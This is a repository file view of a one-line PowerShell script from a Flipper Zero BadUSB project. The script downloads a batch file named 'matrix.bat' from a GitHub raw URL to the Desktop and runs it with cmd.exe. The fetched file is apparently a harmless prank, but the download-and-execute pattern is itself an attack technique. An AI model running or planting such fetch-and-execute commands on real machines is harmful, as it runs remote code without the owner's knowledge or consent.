Files
flipper-zero-bad-usb/utils/powershell/create_matrix_cmd.ps1
T
2023-03-21 09:56:35 +01:00

2 lines
261 B
PowerShell

$DesktopPath = [Environment]::GetFolderPath("Desktop"); Invoke-WebRequest -Uri https://raw.githubusercontent.com/SeenKid/flipper-zero-bad-usb/main/utils/files/matrix.bat -OutFile "$DesktopPath/matrix.bat"; Start-Process "cmd.exe" "/c $DesktopPath/matrix.bat;"